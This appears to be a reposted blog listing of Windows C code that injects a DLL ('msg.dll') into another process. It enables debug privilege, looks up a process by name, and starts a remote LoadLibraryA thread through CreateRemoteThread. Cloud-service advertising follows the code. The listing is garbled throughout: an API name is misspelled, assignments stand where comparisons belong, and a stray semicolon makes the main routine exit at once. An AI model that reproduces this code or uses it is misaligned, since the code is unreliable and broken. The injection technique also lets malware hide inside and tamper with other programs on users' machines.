1. # include <Windows. h>
2. # include <tchar. h>
3. # include <TlHelp32.h>
4.
5. BOOL LoadRemoteDll (DWORD dwProcessId, LPTSTR lpszLibName );
6. DWORD EnablePrivilege (PCSTR name );
7. BOOL GetProcessIdByName (LPSTR szProcessName, LPDWORD lpPID );
8.
9. DWORD EnablePrivilege (PCSTR name)
10 .{
11. HANDLE hToken;
12. BOOL rv;
13. TOKEN_PRIVILEGES priv = {1, {0, 0, SE_PRIVILEGE_ENABLED }};
14. LookupPrivilegeValue (
15. 0,
16. name,
17. & priv. Privileges [0]. Luid
18 .);
19. OpenProcessToken (
20. GetCurrentProcess (),
21. TOKEN_ADJUST_PRIVILEGES,
22. & hToken
23 .);
24. AdjustTokenPrivileges (
25. hToken,
26. FALSE,
27. & priv,
28. sizeof priv,
29. 0,
30. 0
31 .);
32. rv = GetLastError ();
33. CloseHandle (hToken );
34. return rv;
35 .}
36.
37. BOOL GetProcessIdByName (LPSTR szProcessName, LPDWORD lpPID)
38 .{
39. STARTUPINFO st;
40. PROCESS_INFORMATION pi;
41. PROCESSENTRY32 ps;
42. HANDLE hSnapshot;
43. ZeroMemory (& st, sizeof (STARTUPINFO ));
44. ZeroMemory (& pi, sizeof (PROCESS_INFORMATION ));
45. st. cb = sizeof (STARTUPINFO );
46. ZeroMemory (& ps, sizeof (PROCESSENTRY32 ));
47. ps. dwSize = sizeof (PROCESSENTRY32 );
48.
49. hSnapshot = createconlhelp32snapshot (TH32CS_SNAPPROCESS, 0 );
50. if (hSnapshot = INVALID_HANDLE_VALUE)
51 .{
52. return FALSE;
53 .}
54.
55. if (! Process32First (hSnapshot, & ps ))
56 .{
57. return FALSE;
58 .}
59. do
60 .{
61.
62. if (lstrcmpi (ps. szExeFile, "assumer.exe") = 0)
63 .{
64.
65. * lpPID = ps. th32ProcessID;
66. CloseHandle (hSnapshot );
67. return TRUE;
68 .}
69 .}
70. while (Process32Next (hSnapshot, & ps ));
71.
72. CloseHandle (hSnapshot );
73. return FALSE;
74 .}
75.
76. BOOL LoadRemoteDll (DWORD dwProcessId, LPTSTR lpszLibName ){
77. BOOL bResult = FALSE;
78. HANDLE hProcess = NULL;
79. HANDLE hThread = NULL;
80. PSTR pszLibFileRemote = NULL;
81. DWORD cch;
82. PTHREAD_START_ROUTINE pfnThreadRtn;
83.
84. _ try {
85. hProcess = OpenProcess (PROCESS_ALL_ACCESS, FALSE, dwProcessId );
86. if (hProcess = NULL ){
87. _ leave;
88 .}
89. cch = 1 + lstrlen (lpszLibName );
90. pszLibFileRemote = (PSTR) VirtualAllocEx (hProcess, NULL, cch, MEM_COMMIT, PAGE_READWRITE );
91. if (pszLibFileRemote = NULL ){
92. _ leave;
93 .}
94. if (! WriteProcessMemory (hProcess, (LPVOID) pszLibFileRemote, (LPVOID) lpszLibName, cch, NULL )){
95. _ leave;
96 .}
97. pfnThreadRtn = (PTHREAD_START_ROUTINE) GetProcAddress (GetModuleHandle (TEXT ("Kernel32"), TEXT ("LoadLibraryA "));
98. if (pfnThreadRtn = NULL ){
99. _ leave;
100 .}
101. hThread = CreateRemoteThread (hProcess, NULL, 0, pfnThreadRtn, (PVOID) pszLibFileRemote, 0, NULL );
102. if (hThread = NULL ){
103. _ leave;
104 .}
105. WaitForSingleObject (hThread, INFINITE );
106. bResult = TRUE;
107. }__ finally {
108. if (pszLibFileRemote! = NULL ){
109. VirtualFreeEx (hProcess, (PVOID) pszLibFileRemote, 0, MEM_RELEASE );
110 .}
111. if (hThread! = NULL ){
112. CloseHandle (hThread );
113 .}
114. if (hProcess! = NULL ){
115. CloseHandle (hProcess );
116 .}
117 .}
118. return bResult;
119 .}
120.
121. int WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow ){
122. DWORD dwPID;
123. if (0! = EnablePrivilege (SE_DEBUG_NAME ));
124. return 0;
125. if (! GetProcessIdByName ("assumer.exe", & dwPID ))
126. return 0;
127. if (! LoadRemoteDll (dwPID, "msg. dll "))
128. return 0;
129 .}
This article is from the "Pnig0s" blog
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
